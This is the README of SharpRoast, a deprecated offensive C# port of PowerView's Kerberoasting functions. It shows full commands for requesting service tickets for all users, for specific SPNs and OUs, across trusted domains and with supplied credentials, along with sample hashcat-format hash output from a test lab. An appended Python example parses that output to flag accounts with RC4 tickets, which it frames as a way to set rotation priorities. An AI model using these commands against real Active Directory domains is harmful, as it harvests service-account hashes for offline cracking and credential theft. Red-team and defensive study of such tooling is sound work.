DEPRECATED
SharpRoast is a C# port of various Kerberoasting functionality from PowerView. The KerberosRequestorSecurityToken.GetRequest() method was contributed to PowerView by @machosec. The hashes are output in hashcat format.
@harmj0y is the primary author of this port.
SharpRoast is licensed under the BSD 3-Clause license.
Roast all users in the current domain:
    C:\Temp>SharpRoast.exe all
    SamAccountName       : harmj0y
    DistinguishedName    : CN=harmj0y,CN=Users,DC=testlab,DC=local
    ServicePrincipalName : asdf/asdfasdf
    Hash                 : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...

    SamAccountName       : sqlservice
    DistinguishedName    : CN=SQL,CN=Users,DC=testlab,DC=local
    ServicePrincipalName : MSSQLSvc/SQL.testlab.local
    Hash                 : $krb5tgs$23$$testlab.local$MSSQLSvc/SQL.testlab.local$9994D1...
    ...
Roast a specific SPN:
    C:\Temp>SharpRoast.exe "asdf/asdfasdf"
    Hash                 : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
Roast a specific user in the current domain:
    C:\Temp>SharpRoast.exe harmj0y
    SamAccountName       : harmj0y
    DistinguishedName    : CN=harmj0y,CN=Users,DC=testlab,DC=local
    ServicePrincipalName : asdf/asdfasdf
    Hash                 : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
Roast users from a specified OU in the current domain:
    C:\Temp>SharpRoast.exe "OU=TestingOU,DC=testlab,DC=local"
    SamAccountName       : testuser2
    DistinguishedName    : CN=testuser2,OU=TestingOU,DC=testlab,DC=local
    ServicePrincipalName : service/host
    Hash                 : $krb5tgs$23$*$testlab.local$service/host*$08A6462...
Roast a specific SPN in another (trusted) domain:
    C:\Temp\>SharpRoast.exe "MSSQLSvc/[email protected]"
    Hash                 : $krb5tgs$23$*user$DOMAIN$MSSQLSvc/[email protected]*$9994D148...
Roast all users in another (trusted) domain:
    C:\Temp>SharpRoast.exe "LDAP://DC=dev,DC=testlab,DC=local"
    SamAccountName       : jason
    DistinguishedName    : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local
    ServicePrincipalName : test/test
    Hash                 : $krb5tgs$23$*$dev.testlab.local$test/test*$9129566...
Any of these commands also accept [domain.com\user] [password] arguments to roast with explicit credentials. For example:
    C:\Temp>SharpRoast.exe harmj0y "testlab.local\dfm" "Password123!"
    SamAccountName       : harmj0y
    DistinguishedName    : CN=harmj0y,CN=Users,DC=testlab,DC=local
    ServicePrincipalName : asdf/asdfasdf
    Hash                 : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
We are not planning on releasing binaries for SharpRoast, so you will have to compile yourself :)
SharpRoast has been built against .NET 3.5 and is compatible with Visual Studio 2015 Community Edition. Simply open up the project .sln, choose "release", and build.
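The report layout and hashcat-style header shown in the usage examples can be parsed to list the service accounts whose tickets came back as etype 23 (RC4-HMAC), which is the set to prioritise for password rotation or AES enforcement. This is an added example, not part of SharpRoast; the function names and the sample report are constructed for illustration.

```python
import re

# Added example, not SharpRoast code: parse the report layout shown on the page.
FIELDS = {"SamAccountName", "DistinguishedName", "ServicePrincipalName", "Hash"}
# Header: $krb5tgs$<etype>$*<user>$<realm>$<spn>*$<hex...>. The '*' markers are
# optional here because the page's samples show the header with and without them.
HASH_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*?(?P<user>[^$*]*)\$(?P<realm>[^$]*)"
    r"\$(?P<spn>[^$*]+)\*?\$(?P<data>[0-9A-Fa-f]+)")

def parse_report(text):
    """Return one dict per Hash line; preceding fields attach to that record."""
    records, current = [], {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if not sep or key not in FIELDS:
            continue  # command echo, blank line or "..." continuation
        current[key] = value
        if key == "Hash":  # Hash is the last field of every record
            m = HASH_RE.match(value)
            current["etype"] = int(m["etype"]) if m else None
            current["realm"] = m["realm"] if m else None
            current["spn"] = m["spn"] if m else current.get("ServicePrincipalName")
            records.append(current)
            current = {}
    return records

def rc4_exposed(records):
    """(account, SPN) pairs whose ticket came back as etype 23 (RC4-HMAC)."""
    return sorted({(r.get("SamAccountName", "?"), r["spn"])
                   for r in records if r["etype"] == 23})

# Constructed sample modelled on the page's output; the hex data is filler.
SAMPLE = r"""C:\Temp>SharpRoast.exe all
SamAccountName       : harmj0y
DistinguishedName    : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName : asdf/asdfasdf
Hash                 : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$0A1B2C...

SamAccountName       : sqlservice
ServicePrincipalName : MSSQLSvc/SQL.testlab.local:1433
Hash                 : $krb5tgs$23$$testlab.local$MSSQLSvc/SQL.testlab.local:1433$3D4E5F...
Hash                 : $krb5tgs$23$*$testlab.local$service/host*$6A7B8C...
Hash                 : unparsable-value
"""

if __name__ == "__main__":
    print(rc4_exposed(parse_report(SAMPLE)))
```

Records that consist of a Hash line only, as in the single-SPN usage, are reported with "?" as the account name, and a Hash value that does not match the header is kept with an etype of None.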